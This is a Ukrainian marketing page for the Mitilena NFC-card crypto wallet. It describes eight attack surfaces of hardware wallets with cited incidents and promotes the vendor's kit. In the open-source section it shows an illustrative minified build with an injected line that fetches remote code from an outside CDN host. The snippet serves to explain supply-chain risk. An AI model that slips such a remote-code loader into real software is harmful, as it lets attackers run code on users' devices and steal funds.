8 брішей Відкритий код Чек-лист Питання
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Створити гаманецьСтворити
Апаратні гаманці · неочевидні бріші

Неочевидні бріші апаратного гаманця

Ви купуєте пристрій, щоб закрити дірки. Разом із ним приходять нові: прошивка, оновлення, служба на комп’ютері, екран, коробка, акаунт у продавця. Вісім деталей, які в оглядах записують у плюси, — і вісім способів, якими через них забирали гроші в 2020–2026.

Реальні випадки з датами і сумами За документацією виробників Комплект звіряємо за тим самим списком
Ціна помилкипублічні випадки
2026Coldcard · слабка випадковість у прошивці100+ млн $
2025Bybit · підписанти підписали не те, що бачили1,5 млрд $
2024Dark Skippy · сід витікає через два підписидослідження
2023Ledger Connect Kit · закладка в бібліотеці600 тис. $
2021Підроблений застосунок гаманця в App Store17,1 BTC
2020Витік бази клієнтів Ledger · фішинг роками270 000 осіб
Вісім брішей

Кожна деталь, яку хваля��ь в оглядах, — окрема дірка

Апаратний гаманець закриває одну дірку: ключ більше не лежить на телефоні з інтернетом. Але пристрій не порожній. У нього є прошивка, оновлення, програма на комп’ютері, екран, коробка, продавець із вашою адресою — і кожна деталь додає поверхню атаки, якої раніше не було. Нижче вісім таких деталей: що про них пишуть в оглядах, як через них забирали гроші, як закрити бріш і чи є ця деталь у нашому комплекті.

Бріш 01

Прошивка, яка створює ваш ключ

В оглядах: «захищений чіп, ключ створюється всередині пристрою і ніколи його не залишає»

Ключ — величезне випадкове число, і робить його прошивка. Одна помилка в ній — і ключів насправді мало: їх перебирають у всіх власників одразу, без доступу до пристрою, через роки після покупки. Чіп ні до чого, дірка вище нього.

Випадок
100+ млн $
Coldcard, липень 2026: помилка збірки прошивки з 2021 року тихо підміняла апаратний генератор слабким, засіяним номером пристрою і таймером. Стійкість ключів впала приблизно до 40 біт, 5 000+ адрес спустошено.
Як закрити бріш
Чи можна принести свою випадковість: кидки кубика, власна фраза. Гаманець, який приймає ентропію від вас, не залежить від однієї помилки в прошивці.
Цієї деталі в нас немає
На карті немає прошивки — це зашифрований носій. Ключ створює Mitilena Air із системного генератора пристрою, і ви можете задати власну фразу-сід замість випадкових слів.
Бріш 02

Оновлення, які ви зобов’язані ставити

В оглядах: «виробник регулярно випускає оновлення безпеки»

Кожне оновлення — момент, коли прошивку можна підмінити. Підкручена прошивка ховає шматочки сіда в двох-трьох звичайних підписах, а ззовні пристрій працює як завжди. Не оновлюватися теж не можна: дірки латають саме оновленнями.

Випадок
2 підписи
Dark Skippy, серпень 2024: дослідники показали, що шкідлива прошивка апаратного гаманця виносить увесь сід через дві транзакції. Достатньо один раз оновитися не звідти.
Як закрити бріш
Звідки приходять прошивки і чи перевіряє пристрій їхній підпис. Найкраще, коли оновлювати взагалі нічого.
Цієї деталі в нас немає
На карті нічого оновлювати і нічого підмінити. Підписує застосунок на телефоні, а його збірки підписані і приходять з App Store і Google Play — як у будь-якого застосунку, який ви бачите і закриваєте самі.
Бріш 03 · Відчуйте абсурд
В оглядах: «зручний фірмовий застосунок для комп’ютера»

Гаманець для недовіри, до якого додається служба

Ви купуєте пристрій заради одного: щоб більше не довіряти комп’ютеру. Щоб він запрацював, на цей самий комп’ютер треба поставити фонову службу. Ви її не писали, не запускали і не контролюєте: вона стартує разом із системою, слухає порт, до якого може постукати будь-яка програма на вашій машині, і щось робить просто зараз — що саме, ви не знаєте і ніколи не перевірите.

Вона висіла у фоні і після того, як ви закрили гаманець. Роками. В одного з найбільших виробників це була окрема служба-«міст»; у 2025 році її сховали всередину самого застосунку — служба на місці, просто вмирає разом із вікном. У більшості інших без програми на комп’ютері пристрій — брелок. На Linux додайте правила udev, інакше система не віддасть USB.

Тобто річ, яку ви купили, щоб не залежати від програм на комп’ютері, не працює без програми на комп’ютері. Причому не тієї, яку ви бачите, а тієї, що крутиться під нею.

Цієї деталі в нас немає
На комп’ютер нічого не ставиться: ні служби, ні драйвера, ні порта. Посередник — NFC-чіп, який уже стоїть у вашому телефоні, зроблений його виробником і підпорядковується операційній системі: працює лише коли застосунок відкритий і ви самі приклали карту, і телефон щоразу питає дозвіл. Карта пасивна: ні батарейки, ні радіо, сама нічого не робить. Закрили застосунок — не лишилося нічого, що працює без вас. Чесно: застосунок на телефоні потрібен, і він такий самий, як будь-який інший, — ви його бачите, запускаєте і закриваєте самі. У підсобці ніхто не живе.
Моніторинг системиГАМАНЕЦЬ ЗАКРИТО
ПроцесСтанПрацює
HW Wallet Appгаманець
закритий вами-
hwwalletdфонова служба · міст до USB
працює412 дн. 06:14
запущена системою при входізакрити не можна — це служба
Макет, імена умовні. Так виглядав комп’ютер з одним із найпопулярніших USB-гаманців до 2025 року; потім «міст» вбудували в сам застосунок — служба та сама, просто тепер її не видно в списку.
Алегорія
Будинок заради приватності — і мешканець у підсобці

Ви хотіли будинок заради приватності. Купили. Потім знадобилася охорона — поставили. А щоб тариф на охорону працював, вас попросили пустити в будинок людину у формі, яка живе у вас у підсобці цілодобово, має ключі від усіх дверей і звітує не вам. Ви її не наймали, звільнити не можете, і що вона робить ночами — не знаєте.

Він, звісно, свій. Так написано в договорі. Ви хотіли приватності, а отримали сурогат: будинок із мешканцем, якого не обирали.

Бріш 04 · Відкритий код — це не аудит
В оглядах: «відкритий код — будь-хто може перевірити»

Відкритий код — спосіб програмістам працювати разом, а не знак, що програма не краде

Відкритий вихідний код вигадали, щоб ділитися програмами і лагодити їх спільно. Як інструмент спільної роботи він чудовий. Знаком якості «цей софт не вкраде ваші гроші» він ніколи не був, і ось чому: ви не користуєтеся вихідним кодом. Ви користуєтеся тим, що завантажили.

Між репозиторієм на GitHub і файлом на вашому телефоні — збірка, магазин застосунків, оновлення, сервер. На будь-якому з цих кроків у код може потрапити один рядок, який підвантажує що завгодно звідки завгодно, — і в репозиторії його не буде. Порівняти свою копію з вихідником ви не можете: магазини віддають скомпільований файл, веб-гаманець при кожному відкритті отримує той код, який сервер вирішив віддати саме вам сьогодні, розширення браузера оновлюється мовчки вночі.

«Відкри��о» означає, що якісь люди можуть перевірити якусь версію в якийсь день. Що робить ваша копія просто зараз — не означає.

У репозиторії · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
У вас на телефоні · app-2.4.21.min.js
// send.js — збірка
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Один рядок у збірці. У репозиторії його немає, у магазині його не видно, у вас він працює.
Відкритість не завадила жодному з цих випадків
Ledger Connect Kit2023
відкрита бібліотека на GitHub; шкідливу версію виклали в npm, десятки сайтів підвантажили її живцем за кілька годин
Copay / event-stream2018
відкритий гаманець; закладку принесла залежність, націлена саме на нього
xz utils2024
відкрита двадцять років; бекдор сидів у релізах, поки один інженер випадково не помітив, що вхід по SSH став на пів секунди повільнішим
Coldcard2026
прошивка з відкритим кодом; помилка збірки п’ять років підміняла апаратний генератор слабким — ключі перебрали без доступу до пристрою, 5 000+ адрес, 100+ млн доларів
Що тоді працює
Не читання чужого коду, а дві перевірки, доступні будь-кому. Перша — аудит поведінки: поставте на своєму комп’ютері перехоплювальний проксі, пропустіть через нього застосунок і дивіться, що і куди він надсилає. Код можна не читати — трафік видно цілком. Друга — архітектура, у якій коду нічого красти: якщо ключ ніколи не буває на пристрої з інтернетом, будь-який рядок у будь-якому оновленні безсилий, йому нічого надсилати.
Як у нас
Перше пропонуємо самі: пропустіть наш застосунок через проксі, веб-версію — через DevTools браузера, і дивіться кожен запит. Ключ підпису і сід у них не з’являться; єдина застерега — ключ перегляду Monero, про нього на сторінці «Як гаманець надсилає крипту». Друге — у комплекті: ключ народжується в Mitilena Air на пристрої без інтернету, живе на карті, а в онлайн-застосунок потрапляє лише підпис — там і проксіювати нічого. І офлайн тут справжній: у режимі air-gap пристрій із ключем ні до чого не підключений — ні кабелем, ні Bluetooth, транзакція входить і виходить QR-кодом, який ви бачите очима. Не «холодний» гаманець на шнурку, що висить на онлайн-комп’ютері зі своєю службою і обмінюється з ним невідомо чим.
Бріш 05

Екран, на якому не видно, що підписуєш

В оглядах: «підтвердження на екрані пристрою — вірус на комп’ютері безсилий»

Екран маленький, і часто на ньому не адреса і сума, а хеш або «виклик контракту». Ви підтверджуєте те, чого не бачите, — і підпис при цьому чесний, ваш. Екран дає відчуття контролю, якого немає.

Випадок
1,5 млрд $
Bybit, лютий 2025: підписанти з апаратними гаманцями підтвердили переказ, який в інтерфейсі виглядав звичайним. Пристрої показали дані, які людина не могла звірити.
Як закрити бріш
Отримувач, сума і тип операції людською мовою, а не хеш, і відмова однією кнопкою.
Як у нас
Екран є, але це екран телефона: адреса, сума і тип запиту словами — переказ, виклик контракту, дозвіл — і кнопка «Відхилити». Для великих сум — окремий пристрій без мережі, куди транзакція приходить цілком.
Бріш 06

Коробка, у якій уже лежить сід

В оглядах: «приходить у запечатаній коробці із захисною пломбою»

Фізичний пристрій — це доставка, посередники і маркетплейси «зі знижкою». Гаманець приходить уже налаштованим, із сідом на папірці всередині. Або застосунок-двійник у магазині просить «ввести сід для активації».

Випадок
17,1 BTC
App Store, 2021: власник апаратного гаманця ввів сід у застосунок-двійник і втратив 17,1 BTC. Того ж року клієнтам Ledger після витоку бази розсилали підроблені пристрої з листом «перенесіть сід на нове».
Як закрити бріш
Ініціалізувати самому і ніколи не користуватися сідом, який прийшов уже написаним. Пломба — не перевірка; перевірка в тому, що ключ створюєте ви.
Як у нас
Карти приходять чистими: ключ створюєте ви і записуєте самі, «готового» сіда в коробці бути не може. Застосунок — лише з App Store і Google Play за посиланнями з сайту; сід він питає лише при імпорті і підписі.
Бріш 07

Акаунт у виробника

В оглядах: «офіційна гарантія, підтримка і особистий кабінет»

Щоб купити пристрій, ви залишаєте виробнику ім’я, пошту і адресу доставки. Тепер ваша безпека залежить від його бази. Витече — і вам роками писатимуть «підтвердіть сід на новому пристрої», іноді надсилаючи посилки.

Випадок
270 000 осіб
Ledger, 2020: витекли дані 270 000 покупців, включно з поштовими адресами. Листи, дзвінки і посилки з проханням «мігрувати» сід ідуть досі.
Як закрити бріш
Чим менше про вас знають, тим коротший вектор: покупка без акаунта, підтримка, яка ніколи не питає сід, і правило «сід питає лише злодій».
Цієї деталі в нас немає
Гаманець працює без реєстрації, акаунта немає. Продавцю відома лише адреса доставки. Сід не питає ні підтримка, ні застосунок.
Бріш 08

Один пристрій і один папірець

В оглядах: «міцний корпус, великий екран, акумулятор на тиждень»

Чим більше деталей, тим більше ламається: роз’єм, екран, батарея. А відновлення впирається в один папірець із сідом — залитий, загублений під час переїзду, сфотографований «про всяк випадок». Найчастіша причина втрат — не злам.

Випадок
≈20 % BTC
За оцінкою Chainalysis, близько п’ятої частини всіх біткоїнів утрачені назавжди — здебільшого через утрачені ключі, а не злами.
Як закрити бріш
Скільки копій ключа дають із коробки і в якому вигляді, що відбувається при втраті пристрою, чи є в ньому чому ламатися.
Цієї деталі в нас немає
Немає екрана, батареї і роз’єму — ламатися нічому. І не одна копія, а п’ять дзеркальних із коробки: дві NFC-карти і три стелс-стікери у водонепроникному пластику, 10+ років.
Чек-лист

Чого в гаманці бути не повинно

Вісім деталей за вісьмома брішами. Список підходить будь-якому гаманцю — апаратному, мобільному, браузерному. Позначте, що є в того, який ви обираєте, — і в нашого теж.

01
Ключ, який створює лише програмабез вашої випадковості — своєї фрази чи кубиків
02
Оновлення там, де лежить ключкожне оновлення — шанс підмінити
03
Служба, драйвер або порт на комп’ютерідив. бріш 03
04
Бейдж «open source» замість архітектуриключ там, куди може потрапити чужий код
05
Екран, на якому хеш замість адреси і сумиі немає кнопки «Відхилити»
06
Сід, який прийшов уже написаниму коробці, у листі, у «застосунку для активації»
07
Акаунт у виробникаі підтримка, яка може спитати сід
08
Єдина копія і деталі, які ламаютьсяекран, батарея, роз’єм, один папірець
У комплекту Ultimate за цим списком немає жодної з восьми деталей. У коробці — 2 NFC-карти і 3 стелс-стікери, програма Mitilena Air (ключі без інтернету) і Mitilena Keys (підпис без інтернету). Карти приходять порожніми: ключ створюєте і шифруєте ви, а не заводський чіп. Склад і ціна →
Ultimate · офлайн-комплект

Не заводський «безпечний чіп» — носій, який шифруєте ви

Карти приїжджають порожніми. Ключ створюєте в Mitilena Air на телефоні без інтернету і записуєте самі. Підпис — через Mitilena Keys, теж без мережі: тра��закція ходить QR-кодом. У коробці п’ять однакових копій: 2 NFC-карти і 3 стелс-стікери у водонепроникному пластику. 18 мереж, 20 000+ монет, включно з USDT.

Нічого не ставиться на комп’ютер
Немає прошивки, оновлень, екрана і батареї
Транзакція в офлайн-телефон — звуком або QR-кодом, без кабелю і USB
Працює з безкоштовним застосунком Mitilena на телефоні
Водонепроникний пластик, термін зберігання 10+ років
Доставка по всьому світу · mitilena-store.com
NFC-карта Mitilena
Ultimate · генерація і підпис без мережі
€369€439
2 NFC-карти · 3 стелс-стікери · Mitilena Air · ліцензія Mitilena Keys
Замовити Ultimate · €369 Базовий і Premium — усі плани
Питання

Що питають, дочитавши до цього місця

Плюси і мінуси апаратного гаманця, якщо коротко?

Плюс один, і він великий: ключ не лежить на телефоні з інтернетом. Мінуси — вісім деталей вище, кожна додає поверхню атаки. Хороший апаратний гаманець — той, де деталей менше, а не більше.

А якщо телефон заражений?

З картою на основному телефоні ключ з’являється в ізольованому середовищі на секунду підпису — той самий ризик, що в будь-якого гаманця на телефоні, лише коротший. Для сум, за які страшно, — другий рівень: підпис на окремому пристрої без інтернету, куди транзакція потрапляє QR-кодом.

Що якщо карту вкрадуть або загублять?

Без пароля карта і стікер — непотрібний пластик, ключ на них зашифрований. А втрачену копію замінюють решта чотири: дві карти і три стікери з коробки — дзеркальні.

Чи потрібно оновлювати прошивку апаратного гаманця?

Якщо виробник закрив дірку — потрібно, і це той самий момент, коли прошивку можна підмінити: перевіряйте джерело і підпис. У носія без прошивки цього вибору немає — нічого оновлювати і нічого підмінити.

Чим це відрізняється від USB-гаманця?

Відсутністю посередників: немає кабелю, драйвера, фонової служби і програми на комп’ютері. Посередник один — NFC-чіп вашого телефона, і він підпорядковується вам і операційній системі, а не виробнику гаманця.

Відкритий код — значить безпечно?

Значить перевірювано кимось колись. Ви користуєтеся не кодом, а тим, що завантажили, і порівняти одне з іншим не можете. Безпеку дає архітектура, у якій ключа немає там, куди може потрапити чужий код.

NFC-карти з генерацією і підписом без інтернету

Замовити Ultimate · €369 Створити безкоштовний гаманець